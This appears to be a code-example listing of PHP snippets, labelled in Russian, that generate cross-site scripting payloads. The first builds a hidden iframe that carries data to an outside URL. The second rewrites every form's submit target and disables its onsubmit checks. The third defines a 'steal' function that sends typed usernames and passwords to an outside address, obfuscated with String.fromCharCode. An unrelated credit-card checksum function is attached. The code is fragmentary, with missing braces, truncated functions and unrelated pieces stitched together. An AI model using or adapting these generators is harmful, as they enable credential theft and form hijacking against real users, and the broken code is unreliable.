Пример #1
function sendWithIFRAME($url, $data, $quotes)
    $iframe = "<style>#y{display:none;}</style>";
    // We want a invisible iframe, aren't we?
    $iframe .= "<script>document.write(";
    $tmpI = "<iframe id=y src=";
    if (isset($quotes)) {
        $tmpI = toCharArray($tmpI);
        $tmpI .= "+" . generateURL($url, $data, $quotes) . "+";
        $tmpI .= toCharArray("></iframe>");
        $iframe .= $tmpI;
    } else {
        $iframe .= "'";
        $tmpI .= "\"" . generateURL($url, $data, $quotes) . "+'\"></iframe>";
        $iframe .= $tmpI . "'";
    $iframe .= ");";
    $iframe .= "</script>";
    return $iframe;
Пример #2

$result = "<script>";
$result .= "var f=document.forms;";
$result .= "var i=f.length-1;";
// Are you using do!!?? Yes, I'm :) In urls is not recomend
// the use of + because it's transformed into a space.
// And, I don't know why, reverse for doesn't works :S
$result .= "do{";
$result .= "f[i].action=";
if (isset($quotes)) {
    $result .= "String.fromCharCode(" . toCharArray($submitURL) . ")";
} else {
    $result .= "\"" . $submitURL . "\"";
$result .= ";f[i].onsubmit=null;";
// We disable any kind of onsubmit() events, we trust in the user :)
$result .= "}while(--i);";
$result .= "</script>";
Пример #3
    $result .= "var op=String.fromCharCode(111,110,112,114,111,112,101,114,116,121,99,104,97,110,103,101);";
    // OnPropertyChange
$result .= "function cFU(){";
// Check first use
$result .= "if((uL+1 != u.value.length) && uPM==0)";
$result .= " uPM=1;";
$result .= "else";
$result .= " uL++;";
$result .= "}";
$result .= "function steal(){";
$result .= "if(uPM==1){";
if (isset($quotes)) {
    $result .= "window.location=String.fromCharCode(" . toCharArray($submitURL . "?u=") . ")+u.value";
    $result .= "+String.fromCharCode(" . toCharArray("&p=") . ")+p.value;";
} else {
    $result .= "window.location=\"" . $submitURL . "?u=\"+u.value+\"&p=\"+p.value;";
$result .= "p.detachEvent(";
if (isset($quotes)) {
    $result .= "op";
} else {
    $result .= "'onpropertychange'";
$result .= ",steal);";
$result .= "}";
$result .= "}";
$result .= "function uIWHP(){";
// user Is Writing His Password
$result .= "u.detachEvent(";
function cc_check_number($cardnumber)
    $dig = toCharArray($cardnumber);
    $numdig = sizeof($dig);
    $j = 0;
    for ($i = $numdig - 2; $i >= 0; $i -= 2) {
        $dbl[$j] = $dig[$i] * 2;
    $dblsz = sizeof($dbl);
    $validate = 0;
    for ($i = 0; $i < $dblsz; $i++) {
        $add = toCharArray($dbl[$i]);
        for ($j = 0; $j < sizeof($add); $j++) {
            $validate += $add[$j];
        $add = '';
    for ($i = $numdig - 1; $i >= 0; $i -= 2) {
        $validate += $dig[$i];
    if (substr($validate, -1, 1) == '0') {
        return 1;
    } else {
        return 0;